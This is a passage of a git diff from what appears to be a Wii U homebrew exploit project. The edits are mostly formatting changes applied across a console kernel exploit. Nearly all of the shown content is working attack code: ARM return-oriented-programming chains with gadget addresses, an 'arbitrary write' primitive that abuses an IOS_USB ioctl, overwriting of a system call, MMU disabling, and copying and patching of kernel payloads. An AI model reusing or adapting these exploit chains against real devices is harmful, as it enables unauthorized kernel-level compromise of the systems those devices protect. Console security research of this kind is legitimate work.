set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + 0xEE17FF7A, // 0x150 value: clean_loop: MRC p15, 0, r15, c7, c10, 3 + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x20, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0x1AFFFFFD, // 0x150 value: BNE clean_loop - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + 0x1AFFFFFD, // 0x150 value: BNE clean_loop + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x24, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xEE070F9A, // 0x150 value: MCR p15, 0, R0, c7, c10, 4 - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} + 0xEE070F9A, // 0x150 value: MCR p15, 0, R0, c7, c10, 4 + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x28, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE1A03004, // 0x184 value: MOV R3, R4 - 0x0, // 0x188 - 0x10123a8b, // 0x18C POP {R3,R4,PC} - 0x1, // 0x190 R3 must be 1 for the arbitrary write - 0x0, // 0x194 - 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x19C - 0x0, // 0x1A0 - 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) - 0x0, // 0x1A8 - 0x0, // 0x1AC - 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} + 0xE1A03004, // 0x184 value: MOV R3, R4 + 0x0, // 0x188 + 0x10123a8b, // 0x18C POP {R3,R4,PC} + 0x1, // 0x190 R3 must be 1 for the arbitrary write + 0x0, // 0x194 + 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x19C + 0x0, // 0x1A0 + 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) + 0x0, // 0x1A8 + 0x0, // 0x1AC + 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x2C, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE8BD4010, // 0x184 value: POP {R4,LR} - 0x0, // 0x188 - 0x10123a8b, // 0x18C POP {R3,R4,PC} - 0x1, // 0x190 R3 must be 1 for the arbitrary write - 0x0, // 0x194 - 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x19C - 0x0, // 0x1A0 - 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) - 0x0, // 0x1A8 - 0x0, // 0x1AC - 0x10123a9f, // 0x1B0 POP {R0,R1,R4,PC} + 0xE8BD4010, // 0x184 value: POP {R4,LR} + 0x0, // 0x188 + 0x10123a8b, // 0x18C POP {R3,R4,PC} + 0x1, // 0x190 R3 must be 1 for the arbitrary write + 0x0, // 0x194 + 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x19C + 0x0, // 0x1A0 + 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) + 0x0, // 0x1A8 + 0x0, // 0x1AC + 0x10123a9f, // 0x1B0 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x30, // 0x1B4 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE12FFF13, // 0x1B8 value: BX R3 our code :-) - 0x0, // 0x1BC - 0x10123a8b, // 0x1C0 POP {R3,R4,PC} - 0x1, // 0x1C4 R3 must be 1 for the arbitrary write - 0x0, // 0x1C8 - 0x1010CD18, // 0x1CC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x1D0 - 0x0, // 0x1D4 - 0x1012EE64, // 0x1D8 set_panic_behavior (arbitrary write) - 0x0, // 0x1DC - 0x0, // 0x1E0 - 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} + 0xE12FFF13, // 0x1B8 value: BX R3 our code :-) + 0x0, // 0x1BC + 0x10123a8b, // 0x1C0 POP {R3,R4,PC} + 0x1, // 0x1C4 R3 must be 1 for the arbitrary write + 0x0, // 0x1C8 + 0x1010CD18, // 0x1CC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x1D0 + 0x0, // 0x1D4 + 0x1012EE64, // 0x1D8 set_panic_behavior (arbitrary write) + 0x0, // 0x1DC + 0x0, // 0x1E0 + 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} REPLACE_SYSCALL, // 0x1DC start of syscall IOS_GetUpTime64 - 0x4001, // 0x1E0 on > 0x4000 it flushes all data caches - 0x0, // 0x1E0 - 0x1012ED4C, // 0x1E4 IOS_FlushDCache(void *ptr, unsigned int len) - 0x0, // 0x1DC - 0x0, // 0x1E0 - 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} - ARM_CODE_BASE, // 0x1E8 our code destination address - 0x0, // 0x1EC - 0x0, // 0x1F0 - 0x101063db, // 0x1F4 POP {R1,R2,R5,PC} - 0x0, // 0x1F8 - sizeof(ios_kernel),// 0x1FC our code size - 0x0, // 0x200 - 0x10123983, // 0x204 POP {R1,R3,R4,R6,PC} - 0x00140000, // 0x208 our code source location - 0x08131D04, // 0x20C KERNEL_MEMCPY address - 0x0, // 0x210 - 0x0, // 0x214 - 0x1012EBB4, // 0x218 IOS_GetUpTime64 (privileged stack pivot) + 0x4001, // 0x1E0 on > 0x4000 it flushes all data caches + 0x0, // 0x1E0 + 0x1012ED4C, // 0x1E4 IOS_FlushDCache(void *ptr, unsigned int len) + 0x0, // 0x1DC + 0x0, // 0x1E0 + 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} + ARM_CODE_BASE, // 0x1E8 our code destination address + 0x0, // 0x1EC + 0x0, // 0x1F0 + 0x101063db, // 0x1F4 POP {R1,R2,R5,PC} + 0x0, // 0x1F8 + sizeof(ios_kernel), // 0x1FC our code size + 0x0, // 0x200 + 0x10123983, // 0x204 POP {R1,R3,R4,R6,PC} + 0x00140000, // 0x208 our code source location + 0x08131D04, // 0x20C KERNEL_MEMCPY address + 0x0, // 0x210 + 0x0, // 0x214 + 0x1012EBB4, // 0x218 IOS_GetUpTime64 (privileged stack pivot) 0x0, 0x0, 0x101312D0, }; static const int second_chain[] = { - 0x10123a9f, // 0x00 POP {R0,R1,R4,PC} - CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000, // 0x04 destination - 0x0, // 0x08 - 0x0, // 0x0C - 0x101063db, // 0x10 POP {R1,R2,R5,PC} - 0x00130000, // 0x14 source - sizeof(final_chain), // 0x18 length - 0x0, // 0x1C - 0x10106D4C, // 0x20 BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC} - 0x0, // 0x24 - 0x0, // 0x28 - 0x101236f3, // 0x2C POP {R1-R7,PC} - 0x0, // 0x30 arg - 0x101001DC, // 0x34 stackptr - 0x68, // 0x38 stacksize - 0x10101634, // 0x3C proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC} - 0x0, // 0x40 - 0x0, // 0x44 - 0x0, // 0x48 - 0x1010388C, // 0x4C CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} - 0x0, // 0x50 - 0x0, // 0x54 - 0x1012CFEC, // 0x58 MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x5C - 0x0, // 0x60 - IOS_CREATETHREAD, // 0x64 - 0x1, // 0x68 priority - 0x2, // 0x6C flags - 0x0, // 0x70 - 0x0, // 0x74 - 0x101063db, // 0x78 POP {R1,R2,R5,PC} - 0x0, // 0x7C - -(0x240 + 0x18 + 0xF000), // 0x80 stack offset - 0x0, // 0x84 - 0x101141C0, // 0x88 MOV R0, R9; ADD SP, SP, #0xC; LDMFD SP!, {R4-R11,PC} + 0x10123a9f, // 0x00 POP {R0,R1,R4,PC} + CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000, // 0x04 destination + 0x0, // 0x08 + 0x0, // 0x0C + 0x101063db, // 0x10 POP {R1,R2,R5,PC} + 0x00130000, // 0x14 source + sizeof(final_chain), // 0x18 length + 0x0, // 0x1C + 0x10106D4C, // 0x20 BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC} + 0x0, // 0x24 + 0x0, // 0x28 + 0x101236f3, // 0x2C POP {R1-R7,PC} + 0x0, // 0x30 arg + 0x101001DC, // 0x34 stackptr + 0x68, // 0x38 stacksize + 0x10101634, // 0x3C proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC} + 0x0, // 0x40 + 0x0, // 0x44 + 0x0, // 0x48 + 0x1010388C, // 0x4C CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} + 0x0, // 0x50 + 0x0, // 0x54 + 0x1012CFEC, // 0x58 MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x5C + 0x0, // 0x60 + IOS_CREATETHREAD, // 0x64 + 0x1, // 0x68 priority + 0x2, // 0x6C flags + 0x0, // 0x70 + 0x0, // 0x74 + 0x101063db, // 0x78 POP {R1,R2,R5,PC} + 0x0, // 0x7C + -(0x240 + 0x18 + 0xF000), // 0x80 stack offset + 0x0, // 0x84 + 0x101141C0, // 0x88 MOV R0, R9; ADD SP, SP, #0xC; LDMFD SP!, {R4-R11,PC} 0x0, 0x0, 0x0, 0x00110000 - 0x44, // 0x8C 0x00110010, // 0x90 - 0x0, // 0x94 - 0x0, // 0x98 - 0x0, // 0x9C - 0x0, // 0xA0 - 0x0, // 0xA4 - 0x4, // 0xA8 R11 must equal 4 in order to pivot the stack - 0x101088F4, // STR R0, [R4,#0x44]; MOVEQ R0, R5; STRNE R3, [R5]; LDMFD SP!, {R4,R5,PC} + 0x0, // 0x94 + 0x0, // 0x98 + 0x0, // 0x9C + 0x0, // 0xA0 + 0x0, // 0xA4 + 0x4, // 0xA8 R11 must equal 4 in order to pivot the stack + 0x101088F4, // STR R0, [R4,#0x44]; MOVEQ R0, R5; STRNE R3, [R5]; LDMFD SP!, {R4,R5,PC} 0x0, 0x0, 0x1012EA68, // 0xAC stack pivot @@ -305,7 +305,7 @@ static void uhs_exploit_init(int dev_uhs_0_handle) { memcpy((char *) (0xF4140000), ios_kernel, sizeof(ios_kernel)); payload_info_t *payloads = (payload_info_t *) 0xF4148000; - payloads->size = sizeof(ios_usb); + payloads->size = sizeof(ios_usb); memcpy(payloads->data, ios_usb, payloads->size); pretend_root_hub[33] = 0x500000; @@ -319,10 +319,10 @@ static void uhs_exploit_init(int dev_uhs_0_handle) { } static int uhs_write32(int dev_uhs_0_handle, int arm_addr, int val) { - ayylmao[520] = arm_addr - 24; //! The address to be overwritten, minus 24 bytes - DCStoreRange(ayylmao, 521 * 4); //! Make CPU fetch new data (with updated adress) - OSSleepTicks(0x200000); //! Improves stability - int request_buffer[] = {-(0xBEA2C), val}; //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1 + ayylmao[520] = arm_addr - 24; //! The address to be overwritten, minus 24 bytes + DCStoreRange(ayylmao, 521 * 4); //! Make CPU fetch new data (with updated adress) + OSSleepTicks(0x200000); //! Improves stability + int request_buffer[] = {-(0xBEA2C), val}; //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1 int output_buffer[32]; return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer)); } diff --git a/source/ios_kernel/source/elf_abi.h b/source/ios_kernel/source/elf_abi.h index 4d9c796..aa119af 100644 --- a/source/ios_kernel/source/elf_abi.h +++ b/source/ios_kernel/source/elf_abi.h @@ -1,3 +1,4 @@ +// clang-format off /* * Copyright (c) 1995, 1996, 2001, 2002 * Erik Theisen. All rights reserved. diff --git a/source/ios_kernel/source/elf_patcher.c b/source/ios_kernel/source/elf_patcher.c index 45faa91..2b33733 100644 --- a/source/ios_kernel/source/elf_patcher.c +++ b/source/ios_kernel/source/elf_patcher.c @@ -21,16 +21,14 @@ * 3. This notice may not be removed or altered from any source * distribution. ***************************************************************************/ -#include "types.h" #include "elf_abi.h" +#include "types.h" #include "utils.h" static Elf32_Phdr *get_section(u32 data, u32 vaddr) { Elf32_Ehdr *ehdr = (Elf32_Ehdr *) data; - if (!IS_ELF (*ehdr) - || (ehdr->e_type != ET_EXEC) - || (ehdr->e_machine != EM_ARM)) { + if (!IS_ELF(*ehdr) || (ehdr->e_type != ET_EXEC) || (ehdr->e_machine != EM_ARM)) { return 0; } diff --git a/source/ios_kernel/source/elf_patcher.h b/source/ios_kernel/source/elf_patcher.h index 1be026f..b860b44 100644 --- a/source/ios_kernel/source/elf_patcher.h +++ b/source/ios_kernel/source/elf_patcher.h @@ -26,10 +26,10 @@ #include "types.h" -#define ARM_B(addr, func) (0xEA000000 | ((((u32)(func) - (u32)(addr) - 8) >> 2) & 0x00FFFFFF)) // +-32MB -#define ARM_BL(addr, func) (0xEB000000 | ((((u32)(func) - (u32)(addr) - 8) >> 2) & 0x00FFFFFF)) // +-32MB -#define THUMB_B(addr, func) ((0xE000 | ((((u32)(func) - (u32)(addr) - 4) >> 1) & 0x7FF))) // +-2KB -#define THUMB_BL(addr, func) ((0xF000F800 | ((((u32)(func) - (u32)(addr) - 4) >> 1) & 0x0FFF)) | ((((u32)(func) - (u32)(addr) - 4) << 4) & 0x7FFF000)) // +-4MB +#define ARM_B(addr, func) (0xEA000000 | ((((u32) (func) - (u32) (addr) -8) >> 2) & 0x00FFFFFF)) // +-32MB +#define ARM_BL(addr, func) (0xEB000000 | ((((u32) (func) - (u32) (addr) -8) >> 2) & 0x00FFFFFF)) // +-32MB +#define THUMB_B(addr, func) ((0xE000 | ((((u32) (func) - (u32) (addr) -4) >> 1) & 0x7FF))) // +-2KB +#define THUMB_BL(addr, func) ((0xF000F800 | ((((u32) (func) - (u32) (addr) -4) >> 1) & 0x0FFF)) | ((((u32) (func) - (u32) (addr) -4) << 4) & 0x7FFF000)) // +-4MB typedef struct { u32 address; diff --git a/source/ios_kernel/source/instant_patches.c b/source/ios_kernel/source/instant_patches.c index 582fbca..8cefefe 100644 --- a/source/ios_kernel/source/instant_patches.c +++ b/source/ios_kernel/source/instant_patches.c @@ -21,17 +21,17 @@ * 3. This notice may not be removed or altered from any source * distribution. ***************************************************************************/ -#include "utils.h" -#include "types.h" #include "kernel_patches.h" +#include "types.h" +#include "utils.h" -#define mcp_rodata_phys(addr) ((u32)(addr) - 0x05060000 + 0x08220000) -#define mcp_data_phys(addr) ((u32)(addr) - 0x05074000 + 0x08234000) -#define acp_phys(addr) ((u32)(addr) - 0xE0000000 + 0x12900000) +#define mcp_rodata_phys(addr) ((u32) (addr) -0x05060000 + 0x08220000) +#define mcp_data_phys(addr) ((u32) (addr) -0x05074000 + 0x08234000) +#define acp_phys(addr) ((u32) (addr) -0xE0000000 + 0x12900000) void instant_patches_setup(void) { // fix 10 minute timeout that crashes MCP after 10 minutes of booting - *(volatile u32 *) (0x05022474 - 0x05000000 + 0x081C0000) = 0xFFFFFFFF; // NEW_TIMEOUT + *(volatile u32 *) (0x05022474 - 0x05000000 + 0x081C0000) = 0xFFFFFFFF; // NEW_TIMEOUT // patch default title id to system menu *(volatile u32 *) mcp_data_phys(0x050B817C) = *(volatile u32 *) 0x0017FFF0; diff --git a/source/ios_kernel/source/kernel_patches.c b/source/ios_kernel/source/kernel_patches.c index 322ab25..b306957 100644 --- a/source/ios_kernel/source/kernel_patches.c +++ b/source/ios_kernel/source/kernel_patches.c @@ -21,9 +21,9 @@ * 3. This notice may not be removed or altered from any source * distribution. ***************************************************************************/ -#include "types.h" -#include "elf_patcher.h" #include "kernel_patches.h" +#include "elf_patcher.h" +#include "types.h" #include "utils.h" extern void __KERNEL_CODE_START(void); @@ -34,7 +34,7 @@ void kernel_launch_ios(u32 launch_address, u32 L, u32 C, u32 H) { void (*kernel_launch_bootrom)(u32 launch_address, u32 L, u32 C, u32 H) = (void *) 0x0812A050; if (*(u32 *) (launch_address - 0x300 + 0x1AC) == 0x00DFD000) { - int level = disable_interrupts(); + int level = disable_interrupts(); unsigned int control_register = disable_mmu(); u32 ios_elf_start = launch_address + 0x804 - 0x300; @@ -58,4 +58,3 @@ void kernel_run_patches(u32 ios_elf_start) { section_write_word(ios_elf_start, 0xe22b2a78, 0x00000000); section_write_word(ios_elf_start, 0xe204fb68, 0xe3a00000); } - diff --git a/source/ios_kernel/source/main.c b/source/ios_kernel/source/main.c index b929231..213ea45 100644 --- a/source/ios_kernel/source/main.c +++ b/source/ios_kernel/source/main.c @@ -21,17 +21,18 @@ * 3. This notice may not be removed or altered from any source * distribution. ***************************************************************************/ +#include "instant_patches.h" #include "types.h" #include "utils.h" -#include "instant_patches.h" -#define USB_PHYS_CODE_BASE 0x101312D0 +#define USB_PHYS_CODE_BASE 0x101312D0 typedef struct { u32 size; u8 data[0]; } payload_info_t; +// clang-format off static const char repairData_set_fault_behavior[] = { 0xE1, 0x2F, 0xFF, 0x1E, 0xE9, 0x2D, 0x40, 0x30, 0xE5, 0x93, 0x20, 0x00, 0xE1, 0xA0, 0x40, 0x00, 0xE5, 0x92, 0x30, 0x54, 0xE1, 0xA0, 0x50, 0x01, 0xE3, 0x53, 0x00, 0x01, 0x0A, 0x00, 0x00, 0x02, @@ -55,11 +56,12 @@ static const char repairData_usb_root_thread[] = { 0xE2, 0x4D, 0xDE, 0x17, 0xEB, 0x00, 0xB9, 0x92, 0xE3, 0xA0, 0x10, 0x00, 0xE3, 0xA0, 0x20, 0x03, 0xE5, 0x9F, 0x0E, 0x68, 0xEB, 0x00, 0xB3, 0x20, }; +// clang-format on int _main() { - void (*invalidate_icache)() = (void (*)()) 0x0812DCF0; + void (*invalidate_icache)() = (void (*)()) 0x0812DCF0; void (*invalidate_dcache)(unsigned int, unsigned int) = (void (*)()) 0x08120164; - void (*flush_dcache)(unsigned int, unsigned int) = (void (*)()) 0x08120160; + void (*flush_dcache)(unsigned int, unsigned int) = (void (*)()) 0x08120160; flush_dcache(0x081200F0, 0x4001); // giving a size >= 0x4000 flushes all cache diff --git a/source/ios_kernel/source/utils.c b/source/ios_kernel/source/utils.c index 03cd42f..a1b1b42 100644 --- a/source/ios_kernel/source/utils.c +++ b/source/ios_kernel/source/utils.c @@ -30,7 +30,7 @@ void reverse_memcpy(void *dst, const void *src, unsigned int size) { if ((size >= 4) && !((dst - src) & 3)) { const unsigned int *src_p32; unsigned int *dst_p32; - unsigned int endDst = ((unsigned int) dst) + size; + unsigned int endDst = ((unsigned int) dst) + size; unsigned int endRest = endDst & 3; if (endRest) { diff --git a/source/ios_kernel/source/utils.h b/source/ios_kernel/source/utils.h index 6a83e9d..d905625 100644 --- a/source/ios_kernel/source/utils.h +++ b/source/ios_kernel/source/utils.h @@ -24,30 +24,37 @@ #ifndef _UTILS_H #define _UTILS_H -#define ALIGN4(x) (((x) + 3) & ~3) +#define ALIGN4(x) (((x) + 3) & ~3) -#define kernel_memcpy ((void * (*)(void*, const void*, int))0x08131D04) -#define kernel_memset ((void *(*)(void*, int, unsigned int))0x08131DA0) -#define kernel_strncpy ((char *(*)(char*, const char*, unsigned int))0x081329B8) -#define disable_interrupts ((int(*)())0x0812E778) -#define enable_interrupts ((int(*)(int))0x0812E78C) -#define kernel_bsp_command_5 ((int (*)(const char*, int offset, const char*, int size, void *buffer))0x0812EC40) +#define kernel_memcpy ((void *(*) (void *, const void *, int) ) 0x08131D04) +#define kernel_memset ((void *(*) (void *, int, unsigned int) ) 0x08131DA0) +#define kernel_strncpy ((char *(*) (char *, const char *, unsigned int) ) 0x081329B8) +#define disable_interrupts ((int (*)()) 0x0812E778) +#define enable_interrupts ((int (*)(int)) 0x0812E78C) +#define kernel_bsp_command_5 ((int (*)(const char *, int offset, const char *, int size, void *buffer)) 0x0812EC40) void reverse_memcpy(void *dest, const void *src, unsigned int size); static inline unsigned int disable_mmu(void) { unsigned int control_register = 0; - asm volatile("MRC p15, 0, %0, c1, c0, 0" : "=r" (control_register)); - asm volatile("MCR p15, 0, %0, c1, c0, 0" : : "r" (control_register & 0xFFFFEFFA)); + asm volatile("MRC p15, 0, %0, c1, c0, 0" + : "=r"(control_register)); + asm volatile("MCR p15, 0, %0, c1, c0, 0" + : + : "r"(control_register & 0xFFFFEFFA)); return control_register; } static inline void restore_mmu(unsigned int control_register) { - asm volatile("MCR p15, 0, %0, c1, c0, 0" : : "r" (control_register)); + asm volatile("MCR p15, 0, %0, c1, c0, 0" + : + : "r"(control_register)); } static inline void set_domain_register(unsigned int domain_register) { - asm volatile("MCR p15, 0, %0, c3, c0, 0" : : "r" (domain_register)); + asm volatile("MCR p15, 0, %0, c3, c0, 0" + : + : "r"(domain_register)); } #endif diff --git a/source/ios_usb/source/main.c b/source/ios_usb/source/main.c index f82962f..fab8ea6 100644 --- a/source/ios_usb/source/main.c +++ b/source/ios_usb/source/main.c @@ -5,7 +5,7 @@ void _main() { int (*reply)(int, int) = (int (*)(int, int)) 0x1012ED04; int saved_handle = *(volatile int *) 0x0012F000; - int myret = reply(saved_handle, 0); + int myret = reply(saved_handle, 0); if (myret != 0) { ios_shutdown(1); } @@ -20,5 +20,4 @@ void _main() { "newlr: .word 0x1012EACC\n" "newr0: .word 0x10146080\n" "newpc: .word 0x10111164\n"); - } diff --git a/source/main.cpp b/source/main.cpp index 223a5c0..988ae19 100644 --- a/source/main.cpp +++ b/source/main.cpp @@ -1,25 +1,25 @@ +#include #include #include -#include #include #include -#include -#include #include +#include +#include -#include -#include -#include -#include -#include -#include -#include -#include "utils/logger.h" #include "ElfUtils.h" #include "ios_exploit.h" +#include "utils/logger.h" +#include +#include +#include +#include +#include +#include +#include #include "gx2sploit.h" @@ -65,11 +65,11 @@ int main(int argc, char **argv) { } bool loadWithoutHacks = false; - bool kernelDone = false; - bool skipKernel = false; + bool kernelDone = false; + bool skipKernel = false; if ((btn & VPAD_BUTTON_R) == VPAD_BUTTON_R) { - skipKernel = true; + skipKernel = true; loadWithoutHacks = true; } if ((btn & VPAD_BUTTON_ZR) == VPAD_BUTTON_ZR) { @@ -120,7 +120,7 @@ int main(int argc, char **argv) { forceDefaultTitleIDToWiiUMenu(); nn::act::Initialize(); - nn::act::SlotNo slot = nn::act::GetSlotNo(); + nn::act::SlotNo slot = nn::act::GetSlotNo(); nn::act::SlotNo defaultSlot = nn::act::GetDefaultAccount(); nn::act::Finalize(); @@ -145,7 +145,7 @@ int main(int argc, char **argv) { return 0; } -void forceDefaultTitleIDToWiiUMenu() {// Restore the default title id to the normal Wii U Menu. +void forceDefaultTitleIDToWiiUMenu() { // Restore the default title id to the normal Wii U Menu. unsigned long long sysmenuIdUll = _SYSGetSystemApplicationTitleId(SYSTEM_APP_ID_HOME_MENU); memcpy((void *) 0xF417FFF0, &sysmenuIdUll, 8); DCStoreRange((void *) 0xF417FFF0, 0x8); diff --git a/source/utils/logger.h b/source/utils/logger.h index 9b5195f..8b71325 100644 --- a/source/utils/logger.h +++ b/source/utils/logger.h @@ -1,20 +1,20 @@ #pragma once -#include #include +#include #ifdef __cplusplus extern "C" { #endif #define __FILENAME_X__ (strrchr(__FILE__, '\\') ? strrchr(__FILE__, '\\') + 1 : __FILE__) -#define __FILENAME__ (strrchr(__FILE__, '/') ? strrchr(__FILE__, '/') + 1 : __FILENAME_X__) +#define __FILENAME__ (strrchr(__FILE__, '/') ? strrchr(__FILE__, '/') + 1 : __FILENAME_X__) -#define DEBUG_FUNCTION_LINE(FMT, ARGS...)do { \ - WHBLogPrintf("[%23s]%30s@L%04d: " FMT "",__FILENAME__,__FUNCTION__, __LINE__, ## ARGS); \ +#define DEBUG_FUNCTION_LINE(FMT, ARGS...) \ + do { \ + WHBLogPrintf("[%23s]%30s@L%04d: " FMT "", __FILENAME__, __FUNCTION__, __LINE__, ##ARGS); \ } while (0) #ifdef __cplusplus } #endif -